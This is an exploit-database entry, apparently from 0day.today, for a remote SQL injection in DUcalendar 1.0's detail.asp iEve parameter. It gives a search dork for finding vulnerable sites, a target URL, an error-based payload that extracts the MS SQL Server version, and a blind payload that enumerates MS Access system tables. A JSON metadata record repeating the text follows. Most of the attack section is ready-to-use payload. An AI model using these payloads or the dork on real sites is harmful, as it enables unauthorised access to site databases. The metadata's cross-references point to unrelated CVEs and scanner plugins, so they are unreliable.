ID 1337DAY-ID-3285
Type zdt
Reporter 0day Today Team
Modified 2008-06-24T00:00:00
Description
Exploit for unknown platform in category web applications
===================================================================
DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability
===================================================================
DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Inection Exploit
[+] Script : DUcalendar
[+] Version : 1.0 (Maybe others)
[+] Exploit : Remote SQL Injection
[+] Description : ('Free Event Calendar written in ASP. Features include
unlimited entries, organized in category. Events displayed with full
description, date, location. Users can submit new events and search for
events. Complete Web-based Admin. Dreamweaver friendly.')
[+] Dork : intitle:"DUcalendar 1.0"
--//--> Exploit :
http://d0rk.co.il/calendar/detail.asp?iEve={SQL}
--__--> For Ms SQL Server : convert(int,([email protected]@version))--
--__--> For Ms ACCESS (Blind-way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00
--//--> Greetz : allah , Underz0ne Crew , and all my friends ..
# 0day.today [2018-01-06] #
{"id": "1337DAY-ID-3285", "lastseen": "2018-01-06T03:00:52", "viewCount": 24, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-01-06T03:00:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-8813"]}, {"type": "nessus", "idList": ["VIRTUOZZO_VZA-2018-004.NASL", "VIRTUOZZO_VZA-2017-109.NASL", "VIRTUOZZO_VZA-2017-114.NASL", "RANCHEROS_1_1_1.NASL", "VIRTUOZZO_VZA-2017-110.NASL", "GENTOO_GLSA-201510-02.NASL", "HP_VSA_10_0.NASL", "VIRTUOZZO_VZA-2017-111.NASL"]}, {"type": "mskb", "idList": ["KB4462171"]}, {"type": "virtuozzo", "idList": ["VZA-2017-113", "VZA-2018-004", "VZA-2017-110", "VZA-2017-111", "VZA-2017-109"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121415"]}, {"type": "gentoo", "idList": ["GLSA-201510-02"]}, {"type": "zdt", "idList": ["1337DAY-ID-22278"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22278"]}], "modified": "2018-01-06T03:00:52", "rev": 2}, "vulnersScore": 6.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/3285", "description": "Exploit for unknown platform in category web applications", "title": "DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability", "cvelist": [], "sourceData": "===================================================================\r\nDUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability\r\n===================================================================\r\n\r\n\r\n DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Inection Exploit\r\n\r\n\r\n[+] Script : DUcalendar \r\n\r\n[+] Version : 1.0 (Maybe others) \r\n\r\n[+] Exploit : Remote SQL Injection \r\n\r\n[+] Description : ('Free Event Calendar written in ASP. Features include \r\nunlimited entries, organized in category. Events displayed with full \r\ndescription, date, location. Users can submit new events and search for \r\nevents. Complete Web-based Admin. Dreamweaver friendly.') \r\n\r\n[+] Dork : intitle:\"DUcalendar 1.0\" \r\n\r\n--//--> Exploit : \r\n\r\nhttp://d0rk.co.il/calendar/detail.asp?iEve={SQL} \r\n\r\n--__--> For Ms SQL Server : convert(int,([email\u00a0protected]@version))-- \r\n\r\n--__--> For Ms ACCESS (Blind-way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00 \r\n\r\n\r\n--//--> Greetz : allah , Underz0ne Crew , and all my friends .. \r\n\r\n\r\n\n# 0day.today [2018-01-06] #", "published": "2008-06-24T00:00:00", "references": [], "reporter": "0day Today Team", "modified": "2008-06-24T00:00:00", "href": "https://0day.today/exploit/description/3285", "immutableFields": []}
{}
